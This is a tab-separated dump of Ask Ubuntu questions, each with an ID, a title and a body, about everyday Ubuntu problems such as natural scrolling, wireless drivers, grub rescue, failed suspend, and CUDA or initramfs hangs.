496205	natural scrolling with mouse on ubuntu 14.04	i 'm trying to figure out a way to get natural ( reverse ) scrolling to work with a mouse . i know ubuntu has a `` natural scrolling '' preference under system settings , however , that only applies to the trackpad and does n't work with an external mouse . i 've tried the `` naturalscrolling '' package from ppa : zedtux/naturalscrolling : sudo add-apt-repository ppa : zedtux/naturalscrolling sudo apt-get update & & sudo apt-get install naturalscrolling i also tried messing with the .xmodmap file ; however , that does n't seem to work consistently across all applications , which drives me crazy . anyone knows how to get natural scrolling to work consistently across all applications with a mouse ?
496206	tracker recursive indexing fails	i would like tracker to index my complete home directory and all sub-directories / files . i set my home directory as the only directory in the tracker `` places '' ( for indexing ) in the tracker configuration and turned on recursive indexing but unfortunately it seems to have no effect . when i start activities ( ubuntu gnome 14.04 ) via the super key i just can reach all files/direcotories that are directly in my home directory , all sub-directories or files are not indexed and not reachable by the activities view : ( . how can i fix that ? any ideas ?
496210	viruses in ubuntu 14.04 ?	my ubuntu 14.04 system has been hit by a virus , i am 100 % sure this is a virus , let me tell you what happened . so , i was playing minecraft in my desktop with some friends on skype , then my skype logs out due to a disk i/o error . so , i reboot my pc , and it boots up . so , since i run a gaming server , i decide to modify the files , but first i start skype , and my best friend is messaging me and is mad at me for reasons i do n't know , so i go onto the server he is usually on and try to confront him , and he just leaves the game ! i was mad at him back and then wanted to download this file , unfortunutely it did n't let me because i had no space left . so , i go into the system disks , and what do you know ! i have 40gb space left ! i thought it was just a bug , so , i open gparted , and try to resize this other partition to make it smaller and see if it fixes the problem , but i could n't change the numbers as it kept resetting to what it had before , so i try moving the box where you usually resize it , and it does n't even budge ! i then modify the files to prepare to delete this big directory i have backed up , and do it , but when i restart the computer to delete the directory , the computer boots up to a black screen ! how can i fix this ?
496211	virtualbox bridged network ethernet cable disconnecting	iâm trying to connect to a ethernet device ( like a scanner/printer ) to a guest ubuntu 12.04 running on virtualbox 4.3.12 . the scanner is connected to the mac pro directly over ethernet cable . problems faced : 1 ) the ethernet connection gets disconnected and the ip needs to be set again to reconnect . 2 ) how to permanently set a static ip to the bridge adaptor connection ? system : host : mac pro running os x 10.9.3 guest : ubuntu 12.04 32-bit virtualbox settings : bridged adaptor device connected on ethernet ( scanner ) demands : the network settings of the ethernet adapter set from automatic ip address to manual ip address selection with : ip address : 192.168.1.x ( here x can be 0 to 100 ) gateway : 255.255.255.0 in terminal ( terminal_state 0 ) : viki @ c3po : ~ $ ifconfig eth0 link encap : ethernet hwaddr 08:00:27 : b3 : ed : c7 inet6 addr : fe80 : :a00:27ff : feb3 : edc7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4195220 errors:0 dropped:0 overruns:0 frame:0 tx packets:1800 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:651884753 ( 651.8 mb ) tx bytes:381818 ( 381.8 kb ) note : there is no ip address in the line after eth0 . why ? later in terminal ( terminal_state 1 ) : viki @ c3po : ~ $ sudo ifconfig eth0 192.168.1.1 viki @ c3po : ~ $ ifconfig eth0 link encap : ethernet hwaddr 08:00:27 : b3 : ed : c7 inet addr:192.168.1.1 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : feb3 : edc7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2540914 errors:0 dropped:0 overruns:0 frame:0 tx packets:1454 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2995685395 ( 2.9 gb ) tx bytes:308913 ( 308.9 kb ) at this point , the ubuntu wireless network icon is passive ( looks like a sector of a circle ) : https : //drive.google.com/file/d/0b2hiq6p5ced-wtjhmdj1mlnwwlu/edit ? usp=sharing within a minute or two , the wireless network icon starts blinking ( the sector has waves in it ) : finally , in a few seconds , i get a warning wired network disconnected - you are now offline : https : //drive.google.com/file/d/0b2hiq6p5ced-bfp2njhxae5eqta/edit ? usp=sharing now if i do a ifconfig , i get same response as terminal_state 0 mentioned earlier . later , if i set the ip again using sudo ifconfig eth0 192.168.1.1 the i get reconnected .
496216	( another ) how to show full date and time in nautilus/files 3.10+ list view ?	this question is essentially a follow up or continuation of : how to show full date and time in nautilus/files 3.6+ list view ? ... but b/c this is n't answering that question , i 'm disallowed from asking this there . so i 've no other recourse except to ask a new question ( or two ) . the issue is a complaint that nautilus/files has been dumbed-down and does not show hour and minute ( let alone seconds ) information . in the other `` ask '' , a method for patching the source code and recompiling is given and then also a method for just obtaining and installing a ppa is given . i tried both the re-compile method and the ppa method shown in the original `` ask '' . neither one of those work for me . i still just see the stripped/simplified/nearly-useless date stamp . so my question is , can anyone elaborate on and help me get to getting the full date and timestamp ? i 'm not sure if it 's significant or not , but when running the `` nautilus & '' command shown in ... 496073 # 496073 , my terminal spits out : nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . tdb ( __null__ ) : tdb_open_ex : called with name == null the recompile method ( cut-and-pasted from the orgask ) is as follows : =-=-=-=-=-=-=-=-=-=-=-= you can get back the full date by recompiling nautilus : sudo apt-get build-dep nautilus sudo apt-get install quilt export quilt_patches=debian/patches apt-get source nautilus cd nautilus* quilt new 999_full_dates.patch quilt edit libnautilus-private/nautilus-column-utilities.c change line 77 from '' attribute '' , `` date_modified '' , to '' attribute '' , `` date_modified_full '' , rebuild and install modified package : quilt refresh fakeroot dpkg-buildpackage cd .. killall nautilus sudo dpkg -i nautilus_*.deb nautilus & =-=-=-=-=-=-=-=-=-=-=-=- and the ppa method ( also cut-and-pasted ) is to visit : https : //launchpad.net/~mc3man/+archive/nauty-mods thanks . cheers .
496218	nvidia quadro k2000m temperature rises too high playing oil rush	every time i play oil rush , after a few minutes the screen flickers black . if i do n't exit quickly enough i will be left with a black screen but still able to hear the game ( and unable to exit ) . i seem to get more time with lower resolutions / graphics quality but not much . i 've tried both the 331.38 and 304.117 drivers . nouveau is not an option as the mouse cursor was too laggy with it . hp elitebook 8570w nvidia quadro k2000m encrypted home directory max observed temperature 63 degrees c when i exit the game which drops to 44 shortly after . it does seem that the temperature is causing this - but how can i fix this ? civ v plays fine at full resolution !
496220	does chown command require login and logout to reflect changes ?	does chown command require login and logout to reflect changes ?
496221	how to turn wireless and bluetooth on without fn key	i own an old msi x340 which i plan to use it as a media center . the keyboard does not work anymore so i ca n't turn the radio signal on ( fn +f8 and fn+ f9 ) device manager shows intel 5100 wireless card and bluetooth as properly installed . rfkill shows both hard blocked and they do not respond to rkill unblock . here 's what a already tried : update drivers external usb keyboard with fn option virtual keyboard on windows and linux msi s-bar software for windows rfkill unblock all and unblock 1 and 2 bios : does not show any option for build-in hardware enabling or bios update on website i pretty much out of options . any ideias ? thanks so much for the time . alex
496223	build deepin-terminal	i have done cloned deepin-terminal source code from github . now , what should i do if i want to build it and install deepin-terminal into my ubuntu laptop ? thank you for answer and help , i am really newbie in linux .
496228	colored text on terminal is fuzzy	i recently re-installed xubuntu 14.04 . i used the font `` proggy clean ( slashed zero ) '' at as size of 12 . normal text seems to be fine , but when there is colored text , it gets a bit fuzzy ( i.e . there is an extra set of vertical pixels on each glyph ) . my previous installation did n't have this issue . any help on solving this problem would be appreciated . i really like this font and would hate to have to switch to something else because of a stupid issue like this . thanks .
496231	http : //askubuntu.com/questions/489794/cant-boot-xp-only-ubuntu	i ran boot-repair and testdisk trying to repair bootup . now i get grub recovery > and running my istallation disk for ubuntu gets to the ubuntu window with the five moving dots and locks up . i have no idea what commands to use with grub recovery > and i ca n't get to a terminal without ubuntu running . i did try to recover windows xp boot without reloading xp thinking it might repair the bios . i also ran chkdsk /r . none of this helped , same result . thanks for any suggestions .
496235	x2go suddenly stopped working	i am running ubuntu server 14.04 with xfce4 and all of a sudden x2go stopped working . when i try to connect each time i see the following in my auth.log and the client just hangs . jul 10 14:29:51 box sshd [ 2554 ] : pam_unix ( sshd : session ) : session opened for user kelsey by ( uid=0 ) jul 10 14:30:40 box sshd [ 2554 ] : pam_unix ( sshd : session ) : session closed for user kelsey i can rdp into the box over vnc and ssh still works . i have tried the client on mac and windows and also purged x2goserver and openssh and reinstalled but still no joy . the pyhoca-gui client also did n't work . i am at a bit of a loss as to how to troubleshoot further so any help appreciated .
496237	sh : echo : i/o error on pm-suspend ubuntu 14.04	i just installed ubuntu 14.04 on my fujitsu lifebook u772 after a long hiatus with opensuse and after the install , it appears that pm-suspend works out of the box . a few days of setting up later , however , suspend stopped working , with the menu option of suspend only resulting in the screen momentarily going black then returning to the lock screen . i manually tried to suspend the machine from a terminal using sudo pm-suspend but still to no avail . i started looking over the pm-suspend log at /var/log/pm-suspend.log , and i noticed something strange : running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux deathbook 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux module size used by vboxpci 23194 0 vboxnetflt 27613 0 vboxnetadp 25670 0 vboxdrv 339502 3 vboxnetadp , vboxnetflt , vboxpci pci_stub 12622 1 ctr 13049 1 ccm 17773 1 bnep 19624 2 rfcomm 69160 0 bluetooth 395423 10 bnep , rfcomm binfmt_misc 17468 1 nls_iso8859_1 12713 1 arc4 12608 2 iwldvm 232285 0 intel_rapl 18773 0 uvcvideo 80885 0 hid_generic 12548 0 x86_pkg_temp_thermal 14205 0 videobuf2_vmalloc 13216 1 uvcvideo intel_powerclamp 14705 0 videobuf2_memops 13362 1 videobuf2_vmalloc coretemp 13435 0 videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core kvm_intel 143060 0 mac80211 626557 1 iwldvm usbhid 52570 0 kvm 451511 1 kvm_intel i2400m_usb 36521 0 hid 106148 2 hid_generic , usbhid i2400m 107913 1 i2400m_usb wimax 34704 1 i2400m crct10dif_pclmul 14289 0 snd_hda_codec_hdmi 46207 1 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 2 snd_hda_codec_realtek 61438 1 aes_x86_64 17131 1 aesni_intel i915 783703 4 snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel lrw 13286 1 aesni_intel iwlwifi 169932 1 iwldvm snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel gf128mul 14951 1 lrw drm_kms_helper 53081 1 i915 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 glue_helper 13990 1 aesni_intel drm 303102 5 i915 , drm_kms_helper cfg80211 484040 3 iwlwifi , mac80211 , iwldvm ablk_helper 13597 1 aesni_intel snd_seq_midi_event 14899 1 snd_seq_midi cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_rawmidi 30144 1 snd_seq_midi i2c_algo_bit 13413 1 i915 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq mei_me 18627 0 mei 82276 1 mei_me snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi rtsx_pci_ms 18151 0 soundcore 12680 1 snd memstick 16966 1 rtsx_pci_ms joydev 17381 0 mac_hid 13205 0 lpc_ich 21080 0 fujitsu_laptop 18947 0 video 19476 1 i915 serio_raw 13462 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc rtsx_pci_sdmmc 23274 0 e1000e 254433 0 psmouse 102222 0 ahci 25819 5 libahci 32168 1 ahci rtsx_pci 45956 2 rtsx_pci_ms , rtsx_pci_sdmmc ptp 18933 1 e1000e pps_core 19382 1 ptp total used free shared buffers cached mem : 3905144 2586540 1318604 356556 6452 531508 -/+ buffers/cache : 2048580 1856564 swap : 8190472 0 8190472 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : selected interface 'wlan0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : unloading kernel module vboxdrv ... done . /usr/lib/pm-utils/sleep.d/75modules suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . fri jul 11 07:17:01 pht 2014 : performing suspend sh : echo : i/o error fri jul 11 07:17:03 pht 2014 : awake . fri jul 11 07:17:03 pht 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /dev/sdb : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : selected interface 'wlan0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status resume suspend : /usr/lib/pm-utils/sleep.d/000record-status resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success . fri jul 11 07:17:04 pht 2014 : finished . more specifically , it was along these lines ( this is the part where the system actually performs the suspend ) : fri jul 11 07:17:01 pht 2014 : performing suspend sh : echo : i/o error fri jul 11 07:17:03 pht 2014 : awake . fri jul 11 07:17:03 pht 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . i think the weird part here is the sh : echo : i/o error that shows up every time the system does a suspend , as you can see , the system immediately awakens after the error . i 've tried a lot of workarounds that include the following : disabling virtualbox 's vboxdrv modules as i have read that they sometimes interfere with a host machine 's ability to suspend disabling all devices that could wake the system in /proc/acpi/wakeup replacing the errors=remount ro option for / in /etc/fstab to errors=continue despite all of those the problem still persists . could it be an issue with the kernel ? back when i was still using opensuse 12.3 i was stuck in kernel 3.7 , and now here in ubuntu 14.04 i 'm using kernel 3.13 . though i kind of doubt that the kernel might be the issue since 3.13 came out of the box and suspend still worked at that time . update : i 've found that the cause for the echo that causes the i/o fail is in line 321 of /usr/lib/pm-utils/pm-functions . i got this by turning on verbose logging and debugging for pm-suspend , and disabling all hooks ( by moving them temporarily to another directory ) . this is the line in question : do_suspend ( ) { echo -n `` mem '' > /sys/power/state ; } as i understand it , this echo is crucial because it 's the interface between pm-suspend and the low-level functions in the kernel that handle suspends . the issue now is why would an i/o error occur at that moment . i 'll try to manually perform the command on a terminal and see if an i/o error still occurs .
496239	ace stream p2p multimedia plug-in missing in chrome : //plugins	ace stream p2p multimedia plug-in missing in chrome : //plugins screenshot : http : //i.imgur.com/84qk1bh.png i have installed sudo apt-get install acestream-full i did everything like here : http : //forum.torrentstream.org/index.php ? topic=1933.0 ps : mozilla works just fine ...
496240	will files created in windows open in ubuntu ?	i 'm currently considering switching totally to ubuntu . the only thing holding me back is whether or not my photos , music , word processor , and other document files will open in ubuntu . for example , i have done important files i created in open office on my windows computer . will they open on open office in ubuntu ? will my images and photos be displayed the same as they did in windows ? i apologize if this question has been answered previously . i searched , but was unable to located any discussion that addressed my specific question . i am a complete novice when it comes to linux , but i look to learning more . thanks .
496243	update-initramfs hangs on cuda drivers , how to remove / complete update ?	i was trying to `` apt-get install cuda '' from nvidia 's repository , and the process hung on update-initramfs . all apt/dpkg commands i 've since tried , including `` apt-get remove cuda '' , have attempted to run the same update-initramfs command and gotten stuck on it . if i run update-initramfs manually in verbose mode , it hangs after the line `` copying module directory kernel/drivers/gpu '' . how can i persuade it that i do n't want it to look at that ? i 've tried the following things : blacklisting gpu and i915 in /etc/modprobe.d/blacklist.conf changing modules=most to modules=dep in initramfs.conf moving /lib/modules/3.5.0-48-generic/kernel/drivers/gpu to /var/tmp pointing /usr/sbin/update-initramfs at /bin/true , running `` dpkg -- configure -a '' , then running `` apt-get remove cuda* '' . this last sort of fixes the apt mechanism , but update-initramfs still hangs on kernel/drivers/gpu '' , so i guess i need to find some other way of removing the drivers ?
496249	ralink rt3290 - how to reach declared 802.11n speed on ubuntu 14.04	maximum bit rate for rt3290 driver shown by sudo iwlist scan is 54 . but lshw -c network tell me that my wireless card support 300 megabit 802.11n - `` rt3290 wireless 802.11n 1t/1r pcie '' . windows / android / ios devices working fast as it is usual for 802.11n . how to do the same for ubuntu 14.04 netbook with rt3290 ?
496251	problem installing google chrome	i went to the google chrome website and downloaded the 64 bit .deb package from the site , after it downloads and opens the software center , when i click the install button it starts to install then it gives me this error `` dpkg : error processing archive /tmp/google-chrome-stable_current_amd64.deb ( -- install ) : can not access archive : no such file or directory '' , i do not understand why there is no such file when it says under the download page it says `` this will add the add the google repository '' . is there another way to install chrome or is there a way to solve this problem ?
496254	unable to update hardware support software	here is the error text i get when clicking install : the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but 10.1.3-0ubuntu0.1~precise1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but 2:1.15.1-0ubuntu2~precise1 is to be installed
496256	most of ubuntu gui is missing after installing updates	i recently installed 14.04 on a 20gb partition . everything was working fine . i was watching youtube and had got my wireless adapter working as well as my graphics card , so i figured i would update through ubuntu 's update application . everything went smoothly and it asked me to restart . i did , and i was welcomed by a picture of my desktop and one of the folders that i had on there . that 's all . no gui . i could open the folder , but there were no buttons on the windows to minimize or close . no menus or anything . i was even able to get into the software loader and see the updates i had installed , but could n't manage to remove them . i do have access to the virtual console . i have tried turning x on and off and still , nothing . i ran ubuntu recovery and tried every step . no luck . i have a 64 bit version of ubuntu . any help would be gladly appreciated .
496257	lubuntu does not shut down - wait-for-state or eternal splash screen	it started about 40 days now . every time i try to shutdown/restart this notebook , by command line or with the mouse , it freezes at splash screen , freezes showing a `` wait-for-state '' in like a console mode , or it shows an eternal loading splash screen ( but not responding to keyboard ) . which logs do i need to search to see if there is an app thats not being killed or whatever is happening ? i search over the inet but anything work , not the all variants of the shutdown command , nor modifying some lines on a file about killing processes or shutting down ( sorry about this , not remember much more about it ) . the only way to shut down the notebook is by pressing constantly the power button .
496259	xbox gamepad not working using separate x session for games	i cant make it work my usb xbox 360 controller in a separate x session i followed tips here http : //www.reddit.com/r/linux_gaming/comments/1wu02k/playing_in_another_x_instance_is_good_do_it/ it does work normally in default session . im running out of ideas about how i can solve this problem , any ideas ? im running ubuntu 14.04 ( x64 ) thanks in advance !
496262	has samba become the default share in 14.04	i upgraded to 14.04 on all of my desktops and mostly use samba shares . today i was going to create a share on a desktop and was going to just right click and use a nautilus share to save time . when i clicked on the share box in permissions it said `` no share program installed '' and by default started to install samba . has samba become the default share for ubuntu ?
496264	securing shared memory in ubuntu ( linode vps ) renders it useless . does n't boot up	everytime i setup a new vps , i secure shared memory by adding the following to /etc/fstab : tmpfs /dev/shm tmpfs defaults , noexec , nosuid 0 0 which works as expected on every host , except for linode . here is the bootup error i get in lish : init : plymouth-upstart-bridge main process ( 1335 ) terminated with status 1 init : plymouth-upstart-bridge main process ended , respawning init : ureadahead main process ( 1338 ) terminated with status 5 init : plymouth-upstart-bridge main process ( 1343 ) terminated with status 1 init : plymouth-upstart-bridge main process ended , respawning init : plymouth-upstart-bridge main process ( 1350 ) terminated with status 1 init : plymouth-upstart-bridge main process ended , respawning random : nonblocking pool is initialized the vps is never able to boot after this and thus has to be deleted completely . any idea why that might be the case ?
496270	why all my firefox downloads are opened by vlc ?	it has been more than one week and firefox has become opening any downloaded file with vlc even if i change the source of opening the file . in the next download , it will open again with vlc . what should i do ?
496273	installed ubuntu 14.04 on acer aspire 3050 and it would n't recognize the wired network card or the wireless	i was able to get wireless card to work following instructions to look for the broadcom wireless card but it does n't even see the wired network card . i put a xircom pcmcia ethernet card and it is recognized . both wired and wireless cards worked with ubuntu 11.04 and started being stubborn in ubuntu 12.04 . i wo n't even say what i thought of 13.04 after one of the updates did to my power setting in 12.04 and 13.10 if we are upgrading from a version that works , why is n't there a reliable way to pass on hardware information to the install and if items are blacklisted of comment out in the newer version , let us know that there is a problem so we can either correct it during the install or after the upgrade is completed .
496274	deleted linux swap , now booting to grub rescue	i just deleted my linux swap from gparted and used that to extend my main linux partition . now i just boot into grub rescue . it seems like a simple fix in fstab but i 'm not sure . here 's my fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=1e928067-3dcb-4c58-b835-783bd907e916 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=fff1fb3c-65d3-4360-b246-e7de1b7d90e3 none swap sw 0 0 /dev/disk/by-uuid/1c2a5c7f2a5c583a /mnt/1c2a5c7f2a5c583a auto nosuid , nodev , nofail , x- gvfs-show , x-gvfs-name=c 0 0 /dev/disk/by-uuid/4c204724204713fc /mnt/4c204724204713fc auto nosuid , nodev , nofail , x- gvfs-show , x-gvfs-name=f 0 0
496276	installing breach browser	edit : just look at the accepted answer . i was n't how it worked at the time of writing so i just guessed below . i am new to linux so this might be a noob question . i am trying to install a new web browser called breach which is built in javascript specifically node.js , and i wanted to try hacking on it a little bit . i installed the tar folder from off of their site and i have a folder called auto_update_bundle and a file called breach.sh i believe the breach file is a bash script and i was guessing that 's how i install it . ( i have no idea if that 's correct though . ) so i looked up online how to run a bash script . i went in the terminal and this is what i wrote while in the directory of the breach.sh file . sh breach i got this error . [ 3428:3428:0710/191300:858123323 : fatal : browser_main_loop.cc ( 172 ) ] running without the suid sandbox ! see https : //code.google.com/p/chromium/wiki/linuxsuidsandboxdevelopment for more information on developing with the sandbox on . aborted ( core dumped ) i then navigated to the link to code.google.com/ ... above and it said we need a suid helper binary to turn on the sandbox on linux . in most cases , you can run build/update-linux-sandbox.sh and it'll install the proper sandbox for you in /usr/local/sbin and tell you to update your .bashrc if needed . i do n't understand how i can run build/update-linux-sandbox.sh . is build a directory in my root directory ? i tried searching for it there but i could n't find it . i would appreciate any help , and if i 'm heading the wrong direction with properly installing this browser than correct me where i am wrong . thanks in advance .
496279	how to restrict some websites in ubuntu 14.04	i would like to restrict some websites to be surfed . i mean i want to prevent access to some websites . please guide me on how to do the same in ubuntu 14.04 lts .
496280	how to manage kernel upgrades with ubuntu-zfs installed	i have ubuntu-zfs installed . periodically my system downloads minor kernel updates , but does not rebuild the zfs module . on the next reboot , none of the zfs filesystems can be mounted . in the past i 've used dpkg to reconfigure the package and get it to rebuild the module . is there some automatic way this should be happening ? how do i configure it ?
496281	kivy installation folder	i try to use the kivy garden but can not find the installation folder kivy ! if someone could tell me where i could find this folder on ubuntu .
496282	getting message `` error : unknown filesysten grub recovery '' after deleting ubuntu partition ?	after i deleted my ubuntu partition from inside windows 8 , i rebooted my laptop only to get a grub rescue error . i looked all over the internet and was told to do the following commands : set root= ( hd0 , msdos6 ) set prefix= ( hd0 , msdos6 ) /boot/grub insmod normal normal the first two commands work , but when i type in insmod normal , i still get the same error . what should i do ? i 'm a linux noob , so please explain clearly .
496283	unstable wi-fi connection	my pc has had connection problems ever since i installed ubuntu ... the cable connection got better and solved , however the wi-fi one ... windows in this pc caught wi-fi nicely , and another ubuntu pc also catches strong signal , along with android devices , so something got to be up with mine . here 's a few info l @ laptop : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' hm-564 '' mode : managed frequency:2.412 ghz access point : 68 : b6 : fc:5a:73 : c8 bit rate=65 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=45/70 signal level=-65 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:6 missed beacon:0 l @ laptop : ~ $ lspci -nn | grep 0280 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191sevb wireless > lan controller [ 10ec:8172 ] ( rev 10 ) l @ laptop : ~ $ nm-tool networkmanager tool state : connected ( global ) device : wlan0 [ hm-564 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192se state : connected default : yes hw address : e8:39 : df:31 : a4:5a capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *hm-564 : infra , 68 : b6 : fc:5a:73 : c8 , freq 2412 mhz , rate 54 mb/s , strength 56 > wpa wpa2 ipv4 settings : address : 192.168.1.8 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : 00:26:6c:73:07:04 capabilities : carrier detect : yes wired properties carrier : off and here 's the `` bigger pic '' : http : //pastebin.com/2sjgutnq i 've tried this : do n't have network connection using a bcm4313 adapter sudo modprobe -rv wl sudo apt-get remove -- purge bcmwl-kernel-source sudo modprobe -v brcmsmac but it 's the same , if not a bit worse . additional controllers has only my graphics card one , and i 'm half scared that trying something else might strip me of what little i have left ( and i 'm not sure when i 'll get cable connection ) , so ask for help instead .
